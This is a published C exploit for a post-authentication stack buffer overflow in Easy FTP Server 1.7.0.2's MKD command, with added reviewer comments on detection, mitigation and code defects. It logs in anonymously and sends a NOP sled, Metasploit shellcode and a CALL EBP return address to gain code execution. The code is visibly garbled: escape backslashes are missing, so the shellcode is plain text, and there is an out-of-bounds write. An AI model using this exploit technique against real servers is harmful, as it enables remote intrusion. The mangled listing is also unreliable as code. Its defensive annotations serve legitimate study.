# Title : Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit
# Published : 2010-04-04
# Author : x90c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
//*************************************************************************
// Easy~Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit
// ( 11470_x90c.c )
//
// Date: 24/03/2010
// Author: x90c < x90c.org >
//
// Discovered by: loneferret
//
// Exploits by:
// [1] 11470.py (PoC) - loneferret ( Found: 13/02/2010 )
// - http://www.exploit-db.com/exploits/11470
// [2] 11470_x90c.c ( Exploit )
// ( MAGIC RET, Metasploit shellcode )
//*************************************************************************
// Metasploit shellcode ( calc.exe ) - 228 Bytes
// Opaque payload bytes taken verbatim from the published listing; nothing
// here derives, decodes or verifies them.
// NOTE(review): as reproduced on this page the literals contain no `\`
// characters, so what the compiler sees is plain ASCII text, not the binary
// blob the header above describes; its strlen() therefore differs from the
// "228 Bytes" figure and the offsets computed in main() no longer match
// the author's intent. Treat the listing as a historical artefact, not as
// something that builds into the described program.
static char shellcode[] =
{
"xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93"
"x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f"
"x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04"
"x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb"
"x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e"
"x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6"
"xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21"
"xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11"
"x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a"
"x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5"
"xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21"
"x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69"
"xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36"
"xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5"
"x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b"
"x1bx35x1d"
};
// Entry point of the published proof-of-concept: connects to <Target IP>:<Port>,
// logs in as anonymous, and sends one oversized MKD command built in x0x[].
//
// Defender's reading of what the code demonstrates (all points visible below):
//  * The triggering traffic is a single MKD command whose argument is ~270
//    bytes of 0x90 filler with a payload embedded at offset 20. An FTP
//    server-side bound on the MKD argument length, and denying MKD to
//    anonymous users, are the mitigations the code itself implies (it bails
//    out on "denied." / "too long" replies).
//  * Detection: an MKD argument far longer than any legitimate directory name,
//    from an anonymous session, is the observable signature.
//
// C-level defects in the listing as shown (left unchanged here):
//  * recv() return values are never checked and rbuf is never NUL-terminated,
//    so strstr() on rbuf can read past the 128-byte buffer (UB), or read an
//    uninitialized buffer if recv() returns <= 0.
//  * x0x is declared with 278 elements, so x0x[278] below writes one past
//    the end of the array (UB), and only 278 bytes are sent anyway.
//  * 'xEC'-style single-quoted tokens are multi-character constants
//    (implementation-defined int value, narrowed to char), not byte escapes.
//  * close() is used without <unistd.h>, and inet_addr() typically needs
//    <arpa/inet.h>; neither is included above (implicit declarations).
//  * close(sockfd) also runs when socket() failed (sockfd == -1).
//  * atoi() reports no parse error; any non-numeric port silently becomes 21.
//  * The "[!] Exploit Failed" path returns err == 0, so the exit status does
//    not distinguish that case from success.
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in sa;
char rbuf[128];          // server reply buffer; never NUL-terminated before strstr()
char x0x[278];           // outgoing MKD command; valid indices are 0..277
int i = 0, j = 0;
int port = 0;
int err = 0;             // returned from main: 0, -1 (socket), -2 (connect)
printf("nn***********************************************n");
printf("* Easy FTP Server 1.7.0.2 MKD Remote BoF *n");
printf("* Found by: loneferret *n");
printf("* - http://www.exploit-db.com/exploits/11470 *n");
printf("* - 11470_x90c.c - x90c *n");
printf("***************************************************nn");
if( argc < 3 )
{
printf("Usage: %s <Target IP> <Port>nn", argv[0]);
exit(1);
}
// atoi() cannot signal a parse failure; out-of-range or non-numeric input
// falls back to the FTP default port.
port = atoi(argv[2]);
if(port <= 0 || port > 65535)
{
port = 21;
}
printf("[PORT] %d/tcpn", port);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
// inet_addr() returns INADDR_NONE on a malformed address; the result is not checked.
sa.sin_addr.s_addr = inet_addr(argv[1]);
sa.sin_port = htons(port);
if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
{
err = -1;
fprintf(stderr, "[!] Socket failedn");
goto out;   // note: still reaches close(sockfd) with sockfd == -1
}
// Socket Connect
if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1)
{
err = -2;
fprintf(stderr, "[!] Connection failed!n");
goto out;
}
printf("[+] Connected!n");
// Auth
// Each recv() below ignores its return value; rbuf may be unterminated or
// uninitialized when strstr() scans it.
recv(sockfd, rbuf, sizeof(rbuf), 0);
send(sockfd, "USER anonymousrn", 16, 0);
recv(sockfd, rbuf, sizeof(rbuf), 0);
if(strstr(rbuf, "okay") != NULL)
printf("[USER] anonymousn");
send(sockfd, "PASS anonymousrn", 16, 0);
recv(sockfd, rbuf, sizeof(rbuf), 0);
if(strstr(rbuf, "logged in.") != NULL)
printf("[PASS] anonymousn");
// Fill Payload
// Whole command buffer is pre-filled with 0x90; the shellcode array is then
// copied in starting at offset 20. No check that 20 + strlen(shellcode)
// stays below sizeof(x0x), and j (int) is compared against size_t.
memset(&x0x, 0x90, sizeof(x0x));
for(i = 20, j = 0; j < strlen(shellcode); j++)
x0x[i++] = shellcode[j];
x0x[0] = 'M';
x0x[1] = 'K';
x0x[2] = 'D';
x0x[3] = ' ';
// MAGIC RET:
// # CALL EBP ( EBP Register points to nopsled of this payload when overflowed )
// # 004041EC FFD5 |CALL EBP
// #
//
// The single-quoted tokens below are multi-character constants as printed
// on this page (implementation-defined value, narrowed to char).
x0x[272] = 'xEC';
x0x[273] = 'x41';
x0x[274] = 'x40';
x0x[275] = 'x00';
x0x[276] = 'r';
x0x[277] = 'n';
x0x[278] = 'x00';   // out of bounds: x0x has 278 elements (UB)
printf("[+] Sending payload...n");
// Send payload
// Only the first 278 bytes are sent; the out-of-bounds store above is never transmitted.
send(sockfd, x0x, 278, 0);
recv(sockfd, rbuf, sizeof(rbuf), 0);
// A server that denies MKD to anonymous users, or rejects over-long arguments,
// stops the attempt here -- both are the mitigations this check reveals.
if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL))
{
printf("[!] anonymous account doesn't have permission to MKD command...n");
printf("[!] Exploit Failed. ;-xn");
goto out;   // err is still 0 on this path
}
printf("[+] Exploited :-)n");
out:
close(sockfd);   // close() is declared in <unistd.h>, which is not included
return err;
}